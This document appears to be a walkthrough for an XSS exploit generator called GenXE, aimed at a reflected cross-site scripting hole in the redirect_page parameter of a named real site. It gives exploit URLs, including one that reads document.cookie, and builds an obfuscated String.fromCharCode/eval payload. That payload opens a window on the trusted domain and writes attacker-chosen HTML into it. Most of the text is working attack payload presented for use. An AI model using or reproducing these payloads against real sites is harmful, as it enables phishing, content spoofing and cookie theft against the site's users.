SimpleXssExploit
--> Shellscript-in-Another-Window Exploit
Walkthrough
SN:WS1-030921132200

Task Description
We have found an XSS at domain alerts.securityfocus.com,
Url is here:
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert(document.cookie)</script>

We want to open a new window with the following Url displayed:
http://alerts.securityfocus.com/ep/alerts-users/index.epl

And display the following HTML Code in the new window:
This site may be<B> faked!<B>
that means we'll execute the following script in the new window:
document.write("This site may be<B> faked!<B>");
setTimeout("document.close()",1000);

Step-By-Step Walkthrough
Step 1/4.Construct Simple Xss exploit that pops up an "alert" messagebox with text genxea(genxem,genxem)genxea

http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert("genxea(genxem,genxem)genxea")</script>

Step 2/4.Open GenXE, and choose to generate
Shellscript-in-Another-Window Exploit, like:



Step 3/4.Copy-And-Paste to fill three fields:
[1/3]SimpleXssExploit
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert("genxea(genxem,genxem)genxea")</script>
[2/3]Script that intialize DestW variable, that is:
DestW=window.open("http://alerts.securityfocus.com/ep/alerts-users/index.epl");
[3/3]And Shellscript-in-Another-Window:
document.write("This site may be<B> faked!<B>");
setTimeout("document.close()",1000);


Step 4/4.Press the button


At last, we get this:
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>eval("eval(String.fromCharCode(68,101,115,116,87,61,110,117,108,108,59,101,118,97,108,40,117,110,101,115,99,97,112,101,40,39,68,101,115,116,87,37,51,68,119,105,110,100,111,119,46,111,112,101,110,37,50,56,37,50,50,104,116,116,112,37,51,65,47,47,97,108,101,114,116,115,46,115,101,99,117,114,105,116,121,102,111,99,117,115,46,99,111,109,47,101,112,47,97,108,101,114,116,115,45,117,115,101,114,115,47,105,110,100,101,120,46,101,112,108,37,50,50,37,50,57,37,51,66,39,41,41,59,102,117,110,99,116,105,111,110,32,69,120,101,99,117,116,101,83,97,119,40,41,123,105,102,40,68,101,115,116,87,33,61,110,117,108,108,41,123,68,101,115,116,87,46,115,101,116,84,105,109,101,111,117,116,40,117,110,101,115,99,97,112,101,40,39,100,111,99,117,109,101,110,116,46,119,114,105,116,101,37,50,56,37,50,50,84,104,105,115,37,50,48,115,105,116,101,37,50,48,109,97,121,37,50,48,98,101,37,51,67,66,37,51,69,37,50,48,102,97,107,101,100,37,50,49,37,51,67,66,37,51,69,37,50,50,37,50,57,37,51,66,37,48,65,115,101,116,84,105,109,101,111,117,116,37,50,56,37,50,50,100,111,99,117,109,101,110,116,46,99,108,111,115,101,37,50,56,37,50,57,37,50,50,37,50,67,49,48,48,48,37,50,57,37,51,66,39,41,44,49,41,59,68,101,115,116,87,61,110,117,108,108,59,125,101,108,115,101,123,115,101,116,84,105,109,101,111,117,116,40,39,69,120,101,99,117,116,101,83,97,119,40,41,39,44,49,48,48,41,59,125,125,69,120,101,99,117,116,101,83,97,119,40,41,59))")</script>

It works as we expected.